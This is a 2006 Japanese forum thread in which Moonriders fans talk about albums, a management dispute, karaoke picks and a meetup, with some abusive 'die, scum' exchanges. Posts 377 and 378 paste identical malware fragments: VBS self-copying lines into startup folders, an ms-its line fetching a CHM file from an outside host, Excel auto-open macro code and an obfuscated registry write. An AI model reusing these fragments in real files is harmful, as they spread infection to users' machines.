本当にしらないので教えてください。N事件

191 :伝説の名無しさん:2006/06/30(金) 21:55:51
またそうやって蒸し返そうとするw

192 :伝説の名無しさん:2006/06/30(金) 22:10:45
しばらくすりゃ落ち着くんじゃない?
新譜だライブだとなれば、自然とそっちの話題に行くだろ。

193 :伝説の名無しさん:2006/06/30(金) 22:11:57
>>190

事務所の告知の日付ミスに対し、普通の会社だったら始末書ものだという書き込み
    ↓
N田が始末書を慶一に提出
    ↓
慶一がろくに確かめもせずにこのスレの住人を口汚く批判
    ↓
慶一批判集中


194 :伝説の名無しさん:2006/06/30(金) 22:37:35
こうやってデマが広がる

195 :伝説の名無しさん:2006/06/30(金) 23:13:59
N田キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

196 :伝説の名無しさん:2006/06/30(金) 23:32:02
ムーンライダーズのファンって本当は音楽の話できない人ばかりなんですね。
なんかガッカリ。

197 :伝説の名無しさん:2006/06/30(金) 23:38:53
>>196
ファンサイトに行けばいいじゃん
お前の来る場所じゃないと思うよ

198 :伝説の名無しさん:2006/06/30(金) 23:42:10
じゃぁ誰が来る場所なんだ?

199 :伝説の名無しさん:2006/07/01(土) 00:08:57
慶一に嫌われてアンチに寝返ったやつとか

200 :伝説の名無しさん:2006/07/01(土) 00:13:07
なるほど。
じゃぁ私の来る場所じゃないですね。
さよなら。

201 :伝説の名無しさん:2006/07/01(土) 01:19:22
2度と来るなよ。死んでろよカス!

202 :伝説の名無しさん:2006/07/01(土) 01:32:09
こんな素敵なスレ。そうも無いと思う俺は心が病んでるのだろうか?

野田の時だってむしろマトモな発言しかしなかったじゃん。
やる時はやるんだよ(意味不明)

203 :伝説の名無しさん:2006/07/01(土) 10:14:50
石塚英彦の出演するキッコーマン「本つゆ」のCM曲が
妙に「はっぴいえんど」風。

204 :伝説の名無しさん:2006/07/01(土) 12:57:49
野田マネージャー(;´Д`)ハァハァ

205 :伝説の名無しさん:2006/07/01(土) 13:17:35
2度と来るなよ。死んでろよカス!

206 :伝説の名無しさん:2006/07/01(土) 13:24:32
>202
自分もそう思う。
でもあれ以降、頭が花畑なのが多く流入してきて最近げんなり。
200なんてアボカドバナナかと。

207 :伝説の名無しさん:2006/07/01(土) 17:28:34
2度と来るなよ。死んでろよカス!

208 :伝説の名無しさん:2006/07/01(土) 17:31:44
ハゲたオヤジがいい年して死ねとか言うなよ

209 :伝説の名無しさん:2006/07/01(土) 17:40:04
お前もな

210 :伝説の名無しさん:2006/07/01(土) 17:55:39
♪禿げた日にぃ〜風呂に浸か〜る僕(・∀・)

211 :伝説の名無しさん:2006/07/01(土) 18:04:30
ハゲたオヤジがいい年して死ねとか言うなよ

212 :伝説の名無しさん:2006/07/01(土) 18:29:28
かなり効いたらしいな
ジジイが調子に乗るなよ

213 :伝説の名無しさん:2006/07/01(土) 18:46:37
自演ご苦労

214 :伝説の名無しさん:2006/07/01(土) 21:15:12
つまらない音楽やってるバンドにはつまらないオタが付く

215 :伝説の名無しさん:2006/07/01(土) 21:17:56
ジジイが調子に乗るなよ

216 :伝説の名無しさん:2006/07/01(土) 21:24:00
ハゲたオヤジがいい年して死ねとか言うなよ

217 :伝説の名無しさん:2006/07/01(土) 22:16:03
まあ景気の良い30周年やってくれよ

218 :伝説の名無しさん:2006/07/01(土) 22:33:43
つまらん

219 :伝説の名無しさん:2006/07/01(土) 22:56:11
博文はもう駄目なんだろうな

220 :伝説の名無しさん:2006/07/01(土) 23:19:00
勝ち組or安泰組
岡田さん、くじらさん、かしぶちさん、リョウメイさん
負け組or行き先微妙組
鈴木兄弟

221 :伝説の名無しさん:2006/07/02(日) 00:20:40
養命酒のCMってギャラいくらくらいなんだろ。
よく、超有名芸能人だとン千万とかいうけど
K1レベルだとン百万?

222 :伝説の名無しさん:2006/07/02(日) 00:31:33
でも博文さんの存在感が一番ライダーズらしいというのも事実

223 :伝説の名無しさん:2006/07/02(日) 00:33:30
mixiミュージックで検索。博文ファンきもいw

224 :伝説の名無しさん:2006/07/02(日) 00:40:30
ライダーズのファン自体がきもいw

225 :伝説の名無しさん:2006/07/02(日) 00:43:05
ムーンライダーズって売れてなくてよかったね。
ハウンドドッグ見てると本当にそう思うよ。
利権絡んでないからねライダーズは。
金はなーいだもん。


ttp://www.hounddog.info/index.html

226 :伝説の名無しさん:2006/07/02(日) 01:21:06
ファンハウス時代のk1の言に対して思う事。

ホントに売れると思って作ってんのか!!??

227 :伝説の名無しさん:2006/07/02(日) 01:44:07
「冷えたビール・・・」あたりはマジでヒット狙ったんじゃない?

228 :伝説の名無しさん:2006/07/02(日) 02:25:33
アーカイブスシリーズは、どんどん出せばいいと思う
それなりに売れるだろうし

229 :伝説の名無しさん:2006/07/02(日) 12:47:24
ビザールまでは大好きだったけど今はあんまり聞かなくなったな

230 :伝説の名無しさん:2006/07/02(日) 12:49:53
折角のタイアップに限って微妙な曲出すもんな
海の家とかM.I.Jとか。。。
ビタキャンとか使ってればもうちょっとは話題になったかも

231 :伝説の名無しさん:2006/07/02(日) 13:30:59
http://www.youtube.com/watch?v=yJi3MSf6J3E
↑の0:30からって、「悲しいしらせ」だよな?

232 :伝説の名無しさん:2006/07/02(日) 15:09:22
ホントだ。

233 :伝説の名無しさん:2006/07/02(日) 22:29:12
石立氏若ーいw

234 :伝説の名無しさん:2006/07/02(日) 22:46:31
ミノルタは慶一三昧だったよね・・・
最近の日本通運のCMなんかギャラ高そうじゃない?

235 :伝説の名無しさん:2006/07/02(日) 23:09:38
僕は「チーズ」はいらないよ
どんなときも どんなときも どんなときも 君はきれいだよ

236 :伝説の名無しさん:2006/07/02(日) 23:27:10
前スレで色々質問した工房です。
とりあえずCAMERA EGAL STYLOを聴いてみました。
歌詞はダサかっこいいを通り越して、ダサいだけのように感じましたが
音はNWと当時の日本の雰囲気を足したみたいで凄く良かったです。

237 :伝説の名無しさん:2006/07/03(月) 00:19:56
君の感性は非常に素晴しい。全く的を射ている。
忠告すればこんなバンドには関わらずに洋楽に行け。そっちの方がいいぞ。

238 :伝説の名無しさん:2006/07/03(月) 00:24:28
>>237
待て待て。

>>236
「マニア・マニエラ」と「Don't Trust Over 30」を、この順序で聴いてみ。

239 :伝説の名無しさん:2006/07/03(月) 01:09:10
>>237
洋楽も聴いてますよ。
ムーンライダーズの音楽性を言葉で表現する時に
たまに引き合いに出されるXTCとか。
>>238
分かりました。ありがとうございます。

240 :伝説の名無しさん:2006/07/03(月) 06:31:36
>>238の順は凄く(・∀・)イイ!

241 :伝説の名無しさん:2006/07/03(月) 12:48:18
あんまりダイアモロンズ勧める人いないよね
俺これが一番好きなんだけど

242 :伝説の名無しさん:2006/07/03(月) 13:49:55
俺も好きだけど初心者に薦めるには重過ぎないか。

243 :伝説の名無しさん:2006/07/03(月) 13:52:29
いいけど、いきなり聴いたら「なんだこのバンド?」になりそうで。

XTC聴いてるのか。そんなにライダーズ被らない(単に音楽面でのみ)から意外の気持ちかな。

244 :241:2006/07/03(月) 14:01:46
そうなのかな?
俺も工房だけど、友達に聴かせたら「ぶっ飛んでてすげぇ!」とか言ってCD何枚か借りてったよw
引かれるか食いつくか、極端なのかね

245 :伝説の名無しさん:2006/07/03(月) 18:35:50
ダイアモロンズのあの暗さは何なんだろうね。
ジャケットからして暗いし。
「Black out」とか「今日もトラブルが…」とか聞いてると、
呼吸が苦しくなりそうになる。

246 :伝説の名無しさん:2006/07/03(月) 21:28:10
それに反比例して「静岡」とかでしょ。
まあ米テロと接点無しじゃないアルバムだけど明と暗が強烈で
妙に不気味なアルバムではある。好きなんだけどね。

247 :伝説の名無しさん:2006/07/03(月) 21:52:51
僕も「ダイアモロンズ」は好きだな。
各曲がどうのこうのということじゃなく、トータル性があって。
「ドントラ」に似てるかも。
それと、あそこまでポップな曲を排除したのもライダーズらしいし。

248 :伝説の名無しさん:2006/07/03(月) 22:11:06
静岡、詩を良く読むと相当ダークだよ。

249 :伝説の名無しさん:2006/07/03(月) 22:16:01
「Lovers Chronicles」暗くて好き

250 :伝説の名無しさん:2006/07/03(月) 22:53:21
工房くんは両親が音楽好きとか?
先入観なしで聴くことが大事だと思うよ。

251 :伝説の名無しさん:2006/07/04(火) 00:21:32
>>248
いわゆる流れ流され辿り着いたってニュアンス?
まあ暗いつえば暗いな。
「フラグス」はハクブン詩でも捻くれてなくて良い。
一頃のハクブンの捻れ感が消えたみたいで良かった。
尤もダイアモロンズも最後に自分らでオチ用意するからなあ。このアルバムでは
成功だけど。

中坊、高校坊やの時に聴く音楽は結構、大切なのが多いよ
(後々、小ッ恥ずかしくなるのも多いけどな)
貪欲に何にでも触手伸ばして聴いてみな。

252 :伝説の名無しさん:2006/07/04(火) 00:32:02
>>250
いや、親はあまり音楽聴かないです。
数年前、ギターを買ったのをきっかけに色々と音楽を聴いていたら
気が付くとここに来てました。

253 :伝説の名無しさん:2006/07/04(火) 07:59:52
こんな荒れ果てた世界の果てまで(涙

254 :伝説の名無しさん:2006/07/04(火) 09:48:15
自分の意志で音楽を探すのは良いけど、あんまりここのゴロツキの言うことに
耳を傾けない方が良いと思うよw

ま、そのゴロツキの一員があえて言うならば、音楽の知識を付けるのは良いけど、
あまり音楽評論みたいなのにははまらないように。ここのオッサン達のように歪みます。

255 :伝説の名無しさん:2006/07/04(火) 10:19:35
>254

結局君もゴロツキと同じく自分の理論押し付けてるじゃんw

256 :伝説の名無しさん:2006/07/04(火) 11:20:05
両名さんのブログのはくぶんさん、すごく疲れてきってるようにみえるのは俺だけか
かしぶちさんの表情は写りのせいか老けて見えるww

257 :伝説の名無しさん:2006/07/04(火) 14:47:48
岡田さんだけ仲間はずれイクナイ!

258 :伝説の名無しさん:2006/07/04(火) 16:32:47
ドコモダケ

259 :伝説の名無しさん:2006/07/04(火) 19:57:56
やはり初心者にはマニア・マニエラ〜青空百景〜アマテュア・アカデミーでしょ?

260 :伝説の名無しさん:2006/07/04(火) 20:08:06
アマチュアを全曲聴いた時の何ともいえない爽快感を
感じて欲しい・・・

261 :伝説の名無しさん:2006/07/04(火) 20:34:23
昔は良かった

262 :伝説の名無しさん:2006/07/04(火) 21:02:02
今年後半のライダーズは何やるんだろうね

263 :伝説の名無しさん:2006/07/04(火) 22:31:57
うんこぽろりんちょ!

264 :伝説の名無しさん:2006/07/04(火) 22:49:26
まさか4月のライブで30周年記念終わりじゃないよな。
アルバム発売何時れすか?

265 :伝説の名無しさん:2006/07/05(水) 01:20:15
知らなかったいつのまにか男がいたなんて・・・・

車内でライダース聞いていたのが原因でしょうか?
このままではがけの上を目指してしまいそうorz

266 :伝説の名無しさん:2006/07/05(水) 01:34:20
>>265
??????

267 :伝説の名無しさん:2006/07/05(水) 01:54:01
>>265
タクシー捕まえて連れ戻しにいけ!

268 :伝説の名無しさん:2006/07/05(水) 10:28:49
大人びた ことばなんて 好きじゃないorz

269 :伝説の名無しさん:2006/07/05(水) 11:41:12
望遠鏡で見ててやるから!(・∀・)

270 :伝説の名無しさん:2006/07/05(水) 11:56:25
天井裏に老いぼれた鼠ぃ〜(・∀・)

271 :伝説の名無しさん:2006/07/05(水) 16:17:58
よくわかんないけどとりあえず黒く塗れ。ついでに眼を潰せ。

272 :伝説の名無しさん:2006/07/05(水) 16:55:19
黒く塗れ、ってのはストーンのオマージュだよね?

273 :伝説の名無しさん:2006/07/05(水) 19:03:41
ええと、和田画伯ですか?

274 :伝説の名無しさん:2006/07/05(水) 19:11:02
慶一のことだからミサイル7発で作詞しそうだな

275 :伝説の名無しさん:2006/07/05(水) 20:32:42
あー。寒い詩書きそうだ。第3次世界大戦うんたらいいそう。

276 :伝説の名無しさん:2006/07/05(水) 20:42:51
いや、ほんと、やめてほしい。
慶一の場合は時事問題をそのまんまだからな。
ちょっとひねってよ。

277 :伝説の名無しさん:2006/07/05(水) 20:44:37
はい、はい、はい、はーい。

278 :伝説の名無しさん:2006/07/05(水) 22:12:47
時事ネタはすぐ風化するからな

279 :伝説の名無しさん:2006/07/05(水) 22:14:31
mixiのコミュになんとも言えんトピックが立ってたが、消えたのね。

280 :伝説の名無しさん:2006/07/05(水) 22:35:56
どんなの?

281 :伝説の名無しさん:2006/07/05(水) 22:57:14
教えれ

282 :伝説の名無しさん:2006/07/05(水) 23:19:41
今は「(1)」とだけ書かれているトピックだよね。
本人がすぐ削除したのか。何だろ。

283 :伝説の名無しさん:2006/07/06(木) 00:13:05
インスタントシャングリラ

……ぷっ。

284 :伝説の名無しさん:2006/07/06(木) 01:24:04
mixiミュージック見ると、一番人気の曲は
9月の海はクラゲの海
ですな。ちょっと意外。


285 :伝説の名無しさん:2006/07/06(木) 01:31:34
mixiミュージックのランキング

1 9月の海はクラゲの海(29)
2 幸せの洪水の前で(18)
2 Don't Trust Over 30(18)
4 青空のマリー(17)
5 Who's Gonna Die First? (16)
6 Beep Beep Beep オーライ(15)
6 涙は悲しみだけで、出来てるんじゃない(15)
8 くれない埠頭(14)
9 Sweet Bitter Candy (13)
9 彼女について知っている二、三の事柄(13)

サンプル少なすぎだろ! みんな、もう少し参加しろよ。

286 :伝説の名無しさん:2006/07/06(木) 01:36:49
B'zの1位(「Splash!」)なんて11,593票だよ・・・

287 :伝説の名無しさん:2006/07/06(木) 03:35:01
悲しいしらせからインスタントシャングリラあたりまではうまくぼかしながら
詞にしてて好きだけどなあ。
デモクラシーは聞いてて辛い。
風化するの早いしね。

288 :伝説の名無しさん:2006/07/06(木) 07:14:59
>>285
いやいや、ライダーズでこれだけ集まれば上出来でしょ。
幸せの洪水の前での高さが少し意外。
決して定番の曲じゃないのに。

289 :伝説の名無しさん:2006/07/06(木) 08:52:32
そういえばSUZUKI K1 7.5ccの「Yes,Paradise,Yes」とかいうCDを380円で
買ってきたんだけど、このCD歌だあるわけでもないし。。。

どういう経緯で発表されたCDなんですか?

290 :伝説の名無しさん:2006/07/06(木) 12:52:26
ttp://www004.upp.so-net.ne.jp/flipside/hou/rid03.html

他人のサイトで恐縮だが詳細はここに。

291 :伝説の名無しさん:2006/07/06(木) 22:04:29
>>265って、もしかして前スレでtouch of〜流してて彼女に止められた人?

292 :伝説の名無しさん:2006/07/07(金) 00:45:25
久しぶりに「イスタンブール・マンボ」を聴いたんだけどさ、
いま聴いてもヘンな曲だねコレ。

293 :伝説の名無しさん:2006/07/07(金) 07:49:07
それを雪村いずみに歌わせようとしたムーン・ライダーズ

294 :伝説の名無しさん:2006/07/07(金) 11:20:25
誘われるままにシークレット・ラブ
溢れるオアシス

エロい歌詞だ。

295 :伝説の名無しさん:2006/07/07(金) 13:20:59
露骨な歌詞は多いな。若い人には赤面(悪い意味で)物の詩もあるだろう。

296 :伝説の名無しさん:2006/07/07(金) 16:53:21
カラオケで「マスカット・ココナッツ・・・」を歌って女の子に軽蔑されたことがある。
画面に歌詞でると結構露骨に卑猥だよね。

297 :伝説の名無しさん:2006/07/07(金) 18:08:15
歌う方が悪いだろw

298 :伝説の名無しさん:2006/07/07(金) 18:40:19
増す核ここ舐めバナナ舐めろ

299 :伝説の名無しさん:2006/07/07(金) 18:49:56
カラオケで「マスカット・ココナッツ・・・」を歌う男がいたので、
思いっきり甘い声でコーラスつけたら咽び泣いて喜ばれた<当方女

300 :伝説の名無しさん:2006/07/07(金) 19:32:22
>>299
濡れた

301 :伝説の名無しさん:2006/07/07(金) 20:14:42
うp

302 :伝説の名無しさん:2006/07/07(金) 20:51:01
しねーよwww

303 :伝説の名無しさん:2006/07/07(金) 21:03:08
エロと言えば、Frou Frouやガラスの虹のPVを思い出す。
あれ、絶対売り上げに貢献しないよね…

304 :伝説の名無しさん:2006/07/07(金) 21:09:18
カラオケで「マスカット・ココナッツ…」を歌ったら、
女の子はきゃあきゃあ言って喜んでたが、男性にドン引きされた。<当方女

305 :伝説の名無しさん:2006/07/07(金) 22:00:31
マスカット・ココナッツ歌ってたら

「ちょっとだーけーしゃーぶるならー」

のとき店員入ってきて恥ずかしかった

306 :伝説の名無しさん:2006/07/07(金) 22:35:16
アコギでライダーズ弾き語りしようぜ

307 :伝説の名無しさん:2006/07/07(金) 22:49:44
カラオケで「スカーレトの誓い」歌ったら途中で止められた






そのあと、みんなオレンジレンジや宇多田ヒカルで盛り上がってた







オレは逝った_| ̄|○

308 :伝説の名無しさん:2006/07/07(金) 23:37:47
>>307
とめるとか最低だな。いくら知らない曲だからって

309 :伝説の名無しさん:2006/07/07(金) 23:49:50
むしろ止めてくれた方が、>>307にとってはよかったのかもしれん。

310 :伝説の名無しさん:2006/07/07(金) 23:53:00
「薔薇がなくちゃ・・・」のところまで歌えたのか?

311 :伝説の名無しさん:2006/07/08(土) 00:55:02
ライダーズの曲でカラオケで歌うのに適してる曲ってなんだろ?
もちろん収録されてる曲でね。

僕は「塀の上で」を熱唱したら、部長が「赤色エレジー」で返してきたことがあったw

312 :伝説の名無しさん:2006/07/08(土) 01:23:34
>>311
無難に「BEATITUDE」か「SWEET BITTER CANDY」かな。
自分は「いとこ同士」を+4してよく歌う。<当方女

避けた方がいいのは、クラゲ、青空のマリー、あたり?(繰り返しがしつこいと言われる)

313 :伝説の名無しさん:2006/07/08(土) 01:28:35
ボクハナクは及川ミッチーの方にあってライダーズにない!

314 :伝説の名無しさん:2006/07/08(土) 01:35:32
「くれない埠頭」とか「黒いシェパード」「Modern Lovers」なんかがいいんじゃないの。
カラオケ行ったことないから、あるかどうか知らないけど。

315 :伝説の名無しさん:2006/07/08(土) 02:18:20
「僕は走って灰になる」がカラオケに収録されてるかなり無駄な案件。

316 :伝説の名無しさん:2006/07/08(土) 04:06:08
昔は「さよならは夜明けの夢に」の杏里版が入ってたけど、今もある?

317 :伝説の名無しさん:2006/07/08(土) 09:08:21
>>316
ライダーズ版のがあるのは確か。
どこの会社かは忘れたけど。
歌ってみたら、いつの間にかトイレタイムになってた。

318 :伝説の名無しさん:2006/07/08(土) 09:36:27
テーゼ カラオケでムーンライダーズの曲を歌うときはそれなりの覚悟が必要

319 :伝説の名無しさん:2006/07/08(土) 09:37:24
>>315
ごめん、たまに歌う。ハモッてくれる人が現れたらいいのにw

320 :伝説の名無しさん:2006/07/08(土) 09:53:37
前奏が長いから、ライダーズファン同士でないと厳しい<僕は走って灰

321 :伝説の名無しさん:2006/07/08(土) 11:20:28
素寒貧もカラオケにはワリと適してる希ガス

322 :伝説の名無しさん:2006/07/08(土) 14:16:53
曲としては「髭と口紅とバルコニー」なんか適してるとは思う。
ただ、1人だと完全には歌えなかったりってあたりが問題か。

323 :伝説の名無しさん:2006/07/08(土) 14:29:30
スカンピンが歌いやすい

324 :伝説の名無しさん:2006/07/08(土) 17:07:58
ダイナマイトとクールガイとか入りやすいのは
唄ってても手拍子してくれる。

つか、その他は試せない。

325 :伝説の名無しさん:2006/07/08(土) 17:51:58
というか、そういう場で誰も知らない曲を唄うのってどうなの?

326 :伝説の名無しさん:2006/07/08(土) 18:19:40
流れが徐々に、ムーンライダーズ・カラオケ オフ会に向かっている悪寒



(´・ω・`)あったら参加したいけど

327 :伝説の名無しさん:2006/07/08(土) 18:30:33
2人ぐらいしか集まらないんじゃないか

328 :伝説の名無しさん:2006/07/08(土) 18:33:21
地方在住だからな〜<自分

次回上京するのは矢野アッコちゃんのコンサートだお(´・ω・`)

329 :伝説の名無しさん:2006/07/08(土) 18:42:24
>>327
みんなオッサンだし

330 :伝説の名無しさん:2006/07/08(土) 19:32:39
東京でやるときは行くよぉ〜
おっさんばっかでもしょうがない・・・

331 :roomdiners3:2006/07/08(土) 19:46:43
都内カラオケオフ経験者の漏れがきましたよ

332 :伝説の名無しさん:2006/07/08(土) 19:51:08
前やったの何年前だったかね。
まだ30代以上板にスレがあったころかな。

333 :伝説の名無しさん:2006/07/08(土) 20:24:34
あの頃スレをロムすれど、思い切れなくて結局参加しなかった。

334 :伝説の名無しさん:2006/07/09(日) 19:47:43
みんなでアラビューって歌ってみたいw

335 :伝説の名無しさん:2006/07/09(日) 20:47:08
それ何の歌?

336 :伝説の名無しさん:2006/07/09(日) 20:51:23
オフコースじゃね?

337 :伝説の名無しさん:2006/07/09(日) 21:16:50
オフコースもライダーズも好きな俺が来ましたよ(・∀・)

338 :伝説の名無しさん:2006/07/09(日) 21:20:55
YES-NOでも聴いて死んでろよカス!

339 :伝説の名無しさん:2006/07/09(日) 22:08:03
>>335
彼女について知っている二、三の事柄w

340 :伝説の名無しさん:2006/07/09(日) 23:47:35
ライダーズがステージで「マニアの受難」をやってくれて
最後のコーラスを客席皆で歌えたら楽しいだろうなって思う。

いつかパワステで全員で「くれない埠頭」を延々と歌ったよね。
楽しかったなあ。

341 :伝説の名無しさん:2006/07/10(月) 00:43:07
>>340

客席の合唱にk-1が「ウォ〜オオ〜」って合いの手入れてくれた時は鳥肌立ったよ

>くれない埠頭inパワステ

342 :伝説の名無しさん:2006/07/10(月) 00:44:47
博文っていつからあんなにスカしだしたんだろう?
チョビヒゲで白い粉かぶってたり、イスタンブールの
裏ジャケみたいな表情もあったのに。

でも博文のヴォーカルは好きです。

343 :伝説の名無しさん:2006/07/10(月) 01:32:01
でも、最近笑顔多くなってきてない?<ハクブンさん

344 :伝説の名無しさん:2006/07/10(月) 01:33:38
すかしてた頃はむしろアニマル~ソロ連発~ファンハウス96年位かなと。

345 :伝説の名無しさん:2006/07/10(月) 11:49:37
義理の息子ってDQNか

346 :伝説の名無しさん:2006/07/10(月) 12:47:27
さて、今日の昼メシ何にするかな…


…ゴクリ

347 :伝説の名無しさん:2006/07/10(月) 12:49:58
とんでもない誤爆スマソ

…ちょっと天国までひとっ飛び逝って来る…

348 :伝説の名無しさん:2006/07/10(月) 23:30:04
>>345
スバリストな。
ナンバーが666だったらよっぽど好きなやつだ

349 :伝説の名無しさん:2006/07/11(火) 12:39:19
誰か7/22あたり、カラオケオフやりませんか
上野か渋谷のパセラで。

350 :伝説の名無しさん:2006/07/11(火) 13:00:05
いいっすね
上野がいいな

351 :伝説の名無しさん:2006/07/11(火) 13:57:21
千葉でやれよ

352 :伝説の名無しさん:2006/07/11(火) 14:36:05
羽田でやれよ

353 :伝説の名無しさん:2006/07/11(火) 16:41:54
ロンドン行きの飛行機の時間を確かめて
羽田で「塀の上で」合唱。

354 :伝説の名無しさん:2006/07/11(火) 16:43:05
いいなあ首都圏在住の方々(´・ω・`)

355 :伝説の名無しさん:2006/07/11(火) 17:39:03
>331
お久しぶりです、83です。カラオケオフは楽しかったよね。

「ライダーズ知らない人と一緒のところで歌うなんて勇気あるな〜」
と思って読んでたよ。会社の呑み会とかか?
ふつーの人と一緒のカラオケは、つまらないのでほぼ行かない。
みんなは私の歌う曲を知らず、私はみんなが歌う曲を知らない。
意味ねー。

356 :伝説の名無しさん:2006/07/11(火) 18:32:05
みんな何歳なの?

357 :伝説の名無しさん:2006/07/11(火) 18:51:38
48才児でつ(´・д・`)

358 :伝説の名無しさん:2006/07/11(火) 19:15:45
すいません、「彼女について知っている二、三の事柄」ってPVありましたっけ?
もし存在するなら、どうやって入手すればいいのでしょう?どなたか教えて!

359 :伝説の名無しさん:2006/07/11(火) 21:01:42
ついこの間まで、ようつべにあったんだけど、
今見に行ったら消えてた。
それともあれはPVじゃなかったのかな?

360 :伝説の名無しさん:2006/07/11(火) 21:44:29
あれはライブ版だね。

361 :伝説の名無しさん:2006/07/11(火) 22:08:23
K1のヤキソバ頭のやつだね

362 :伝説の名無しさん:2006/07/12(水) 00:14:03
4月15日のライブの幕間で上映してたね。

363 :358:2006/07/12(水) 00:15:28
いろいろとレスありがとうございます。確か、「カメラ≠万年筆」の時ショート・フィルムが作られた、
と聞いたことがあったのですが…。古い話で申し訳ありませんが、どなたかご存じないですか?

364 :伝説の名無しさん:2006/07/12(水) 00:32:40
ああ、それなら「彼女に〜」のPVじゃなくて、
アルバムのイメージフィルムのような感じで作られた
モノクロサイレントのやつのことじゃない?

365 :伝説の名無しさん:2006/07/12(水) 01:38:52
「カメラ=万年筆」のライブで「彼女について」演奏のときにバックに上映されたやつかな。
カメ万のジャケットにコマ撮りで載っているやつだよ。
ゴダールの「勝手にしやがれ」みたいなジャンピング・ショットの連続だった。

366 :331:2006/07/12(水) 01:39:02
流れぶったぎってすみません
とりあえず7/22(土)夕刻、上野パセラに逝ってみます
都合付く方、大体の人数を把握したいのでメアド欄に参加の旨お知らせください。
ちなみに当方、当スレでのオフに過去3回参加済みです。

これ以降、この件については直前まで書き込み控えます
失礼しましたノシ

367 :伝説の名無しさん:2006/07/12(水) 02:26:12
mixiミュージックに新機能。
そのアーティストの曲を聴いた人は、他にどんなアーティストを聴いているかを表示。

で、早速ムーンライダーズの「メンバーがよく聴くアーティスト」を見てみたら

YMO、矢野顕子、XTC、カーネーション、ピチカート・ファイブ。

進歩ないな俺たち。

368 :伝説の名無しさん:2006/07/12(水) 03:10:20
つうか「ムーンライダーズ」と「MOONRIDERS」が別々に集計されているのはどうにかならないのか。

369 :伝説の名無しさん:2006/07/12(水) 09:10:26
>>367
コアな奴ほど進歩がない

370 :伝説の名無しさん:2006/07/12(水) 20:01:51
人間が小さく排他的で自己の感性以外は否定対象でしかない。
それがお前等だ。

371 :伝説の名無しさん:2006/07/12(水) 20:51:37
>>370
2chねらそのものだな
自己憐憫もほどほどにしとけよ

372 :伝説の名無しさん:2006/07/12(水) 21:32:29
「進歩」したら、どんな音楽を聞くようになるのかな。
最近のバンドで、ライダーズっぽさを感じられるのって、なにかある?
おれ、一時期くるりにハマっていたんだけど、
近頃の活動ぶりを見ていると、なんか違う感じだしなあ。

373 :伝説の名無しさん:2006/07/12(水) 21:39:09
っ佐藤博

374 :伝説の名無しさん:2006/07/12(水) 21:45:25
つ銀杏BOYZ

375 :伝説の名無しさん:2006/07/12(水) 22:17:07
つ千葉のジャガー

376 :伝説の名無しさん:2006/07/13(木) 00:16:07
はちみつぱいのスレはないんですね。

377 :伝説の名無しさん:2006/07/13(木) 00:18:15
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

378 :伝説の名無しさん:2006/07/13(木) 00:18:36
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

379 :伝説の名無しさん:2006/07/13(木) 00:43:31
糞コード貼ってる奴うざいから死ねよ。今直ぐ死ね。

380 :358:2006/07/13(木) 01:37:47
>>364,365
遅ればせながらありがトン。ってことは、あの時代ライダーズはPVなんて作ってなかったのか…。

381 :伝説の名無しさん:2006/07/13(木) 02:43:00
いや、PVはPVで別にあるんだよ。>>360-362が言っているやつ。

382 :伝説の名無しさん:2006/07/13(木) 07:42:09
>>372
くるり好きならフジファブリックはどう?
